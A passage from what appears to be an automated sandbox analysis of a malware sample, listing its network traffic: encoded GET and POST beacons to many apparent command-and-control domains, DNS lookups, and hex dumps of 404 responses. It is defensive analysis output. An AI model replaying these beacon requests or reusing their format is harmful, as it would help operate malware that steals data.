8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: GET /v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28 HTTP/1.1Host: www.weep.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l4rw/?r8=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&VZ=qzwLUJ3Xbb28 HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t3gh/?r8=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&VZ=qzwLUJ3Xbb28 HTTP/1.1Host: www.fontanerourgente.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zctj/?r8=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&VZ=qzwLUJ3Xbb28 HTTP/1.1Host: www.onlytradez.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kyiu/?VZ=qzwLUJ3Xbb28&r8=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= HTTP/1.1Host: www.32wxd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /f9bc/?r8=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&VZ=qzwLUJ3Xbb28 HTTP/1.1Host: www.jaxo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s= HTTP/1.1Host: www.xforum.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l90v/?r8=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&VZ=qzwLUJ3Xbb28 HTTP/1.1Host: www.cannulafactory.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rgqx/?r8=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&VZ=qzwLUJ3Xbb28 HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="https://www.facebook.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg><span class="screen-reader-text">Facebook</a></li> equals www.facebook.com (Facebook)
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="https://twitter.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1 equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: www.weep.site
            Source: global trafficDNS traffic detected: DNS query: www.88nn.pro
            Source: global trafficDNS traffic detected: DNS query: www.fontanerourgente.net
            Source: global trafficDNS traffic detected: DNS query: www.onlytradez.club
            Source: global trafficDNS traffic detected: DNS query: www.32wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.jaxo.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xforum.tech
            Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
            Source: global trafficDNS traffic detected: DNS query: www.taapbit.online
            Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
            Source: global trafficDNS traffic detected: DNS query: www.anaidittrich.com
            Source: unknownHTTP traffic detected: POST /l4rw/ HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.88nn.proReferer: http://www.88nn.pro/l4rw/Cache-Control: max-age=0Connection: closeContent-Length: 199Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36Data Raw: 72 38 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d Data Ascii: r8=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:53:32 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:53:48 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:53:51 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:53:53 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:53:56 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:04 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
